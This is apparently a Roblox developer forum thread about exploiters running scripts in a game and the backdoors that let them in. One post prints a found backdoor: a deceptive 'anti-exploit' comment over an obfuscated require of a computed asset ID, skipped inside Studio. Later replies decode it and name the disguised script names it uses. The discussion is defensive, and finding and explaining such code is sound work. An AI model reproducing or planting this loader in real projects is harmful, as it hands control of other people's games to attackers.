Recently on my SCPF I have had some issues with exploiters where they can execute very lethal scripts on my game.
I dont know how they are managing to do this being I am not using free models or anything that can be used to infect my game. The only free model I used is the coffee machine verified by roblox.
Does anyone know how people are executing these scripts.
I recognise some of the scripts as 'Star Destroy* scripts. the ones where you turn yourself into an angel. If anyone has any reccomendations on how to find or remove anything in my studio which could be contributing towards exploiters, then please reply.
They also somehow have a script which can disable adonis admin, and I am unaware on how to resolve this.
This is not caused by any script in your game (most of the time). To patch alot of the exploits i recommend to set your game to R15 and add a anti exploit. Alot of the exploits are built for R6 so having a R15 game will cause an error in most R6 exploits
I don’t know which anti exploit is good since i barely add them. I recommend to just create your own anti exploit as its harder to crack for exploiters.
--This an script of ROBLOX Studio. Do not delete it, this script secures your game from exploiters.
--Thanks.
if not game:GetService("RunService"):IsStudio() then
require((397.86020086+0.00000400)*9305953)
end
I dont know what this is, but I did not add it, can someone help me figure out whats adding these scripts and what they are doing?
This kind of thread appears at least once every week or so on the DevForum and it’s the same problem every time. You have a backdoor or vulnerability in your game that you need to go back, search for and fix.
Start checking your plugins and scanning your game for unwanted requires or scripts that you do not believe belong in your game and remove them. If others have access to your game, they need to check their plugins as well.
Have you inserted any free-models (do not be ashamed to say, we’ve all done it at one point in our developing lifetimes)? You could make a script which deletes that fishy one, if you cannot solve the problem. Have a search for some antiviruses, there’s loads. As Colbert said check your plugins, the most fishy one there looks like GUI Scale/Offset converter. Anyway have a clean and see what the antivirus returns.
I’d say to prevent some exploits or back doors is to know the developer and trust them or don’t use free models because they can have back doors in them as well.
Just wanted to bump this thread for awareness in-case anyone else is having this same issue.
This is INDEED a BACKDOOR!
Q: Is this backdoor still being used for exploiters? A: More than likely, yes. If you do the math for the require part of the script …
(397.86020086+0.00000400)*9305953
This equals 3702468367 (rounded up and minus the commas).
Q: Ok, but what does this number mean? A: This number (to my knowledge) is an asset ID and is indeed another plugin. I will link the plugin below.
I DO NOT RECOMMEND YOU INSTALL AND USE THIS!
If you notice, the plugins owner is terminated from ROBLOX. This doesn’t fix the issue at hand.
The real issue here… where is it coming from?
Now, as I stated… I too got this and I believe its from a plugin.
Q: Which plugin is that? A: I’m currently testing my plugins individually to find which one, it seems to place the script in a Part within Workspace every hour or so.
I will let y’all know when I find which out which plugin it is.
Edit #1: The script names I’ve encountered that had the backdoor in it were named… Fix, Debounce and Welding (in that order from when I started noticing them).